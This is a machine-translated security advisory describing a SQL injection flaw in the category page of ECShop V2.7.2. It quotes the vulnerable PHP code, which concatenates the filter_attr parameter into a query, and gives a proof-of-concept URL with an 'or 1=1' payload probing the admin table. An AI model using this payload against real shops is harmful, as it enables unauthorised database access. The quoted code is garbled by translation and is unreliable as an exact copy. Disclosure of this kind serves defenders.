SQL injection vulnerability caused by poor filtering of the category page in ECSHOP mall System
Affected Versions:
ECShop V2.7.2 UTF8_Release0505
Program introduction:
ECSHOP is an open-source free online shop system. Upgraded and maintained by a professional development team to provide you with timely and efficient technical support. You can also customize ECSHOP based on your business characteristics to add special features of your mall.
Vulnerability Analysis:
File category. php
$ Filter_attr_str = isset ($ _ REQUEST [filter_attr])? Trim ($ _ REQUEST [filter_attr]): 0; // 52 rows
$ Filter_attr = empty ($ filter_attr_str )? : Explode (., trim ($ filter_attr_str ));
The variable $ filter_attr_str is an array separated.
// 308 rows
/* Extended item query conditions */
If (! Empty ($ filter_attr ))
{
$ Ext_ SQL = "Select DISTINCT (B. goods_id) FROM ". $ ecs-> table (goods_attr ). "AS ,". $ ecs-> table (goods_attr ). "AS B ". "Where ";
$ Ext_group_goods = array ();
Foreach ($ filter_attr AS $ k => $ v) // locate the product id that meets all the filter attributes */
{
If ($ v! = 0)
{
$ SQL = $ ext_ SQL. "B. attr_value = a. attr_value AND B. attr_id =". $ cat_filter_attr [$ k]. "AND a. goods_attr_id =". $ v;
$ Ext_group_goods = $ db-> getColCached ($ SQL );
$ Ext. = AND. db_create_in ($ ext_group_goods, g. goods_id );
}
}
}
$ V adds SQL queries without any processing, resulting in SQL injection.
Vulnerability exploitation:
Localhost/shop/category. php? Page = 1 & sort = goods_id & order = ASC % 23goods_list & category = 1 & display = grid & brand = 0 & price_min = 0 & price_max = 0 & filter_attr =-999 or 1 = 1 and exists (select * from admin)
Solution:
Vendor patch
ECSHOP
----------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Ecshop